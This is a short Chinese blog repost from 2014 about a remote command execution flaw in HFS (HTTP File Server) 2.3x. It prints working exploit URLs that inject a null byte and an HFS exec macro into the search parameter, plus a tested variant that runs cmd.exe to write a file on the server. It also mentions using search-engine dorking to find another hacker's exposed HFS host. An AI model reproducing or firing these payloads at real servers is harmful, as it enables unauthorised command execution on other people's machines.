码迷,mamicode.com
首页 > 其他好文 > 详细

HFS 2.3x 远程命令执行(抓鸡黑客末日)

时间:2014-09-15 12:55:38      阅读:229      评论:0      收藏:0      [点我收藏+]

标签:blog   http   os   ar   2014   log   c   r   程序   

从某论坛看见的,转载部分:
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。

http://localhost:80/?search==%00{.exec|cmd.}

http://localhost:80/search=%00{.exec|cmd.}

注:有些版本search前面是没有?的。

测试部分:
百度搜HFS默认就是2.3x版本,执行echo测试成功:
http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.}
google hack了一下,发现一个抓鸡黑阔:bubuko.com,布布扣bubuko.com,布布扣

已测试官方最新版,一样存在。bubuko.com,布布扣

HFS 2.3x 远程命令执行(抓鸡黑客末日)

标签:blog   http   os   ar   2014   log   c   r   程序   

原文地址:http://www.cnblogs.com/hookjoy/p/3972571.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!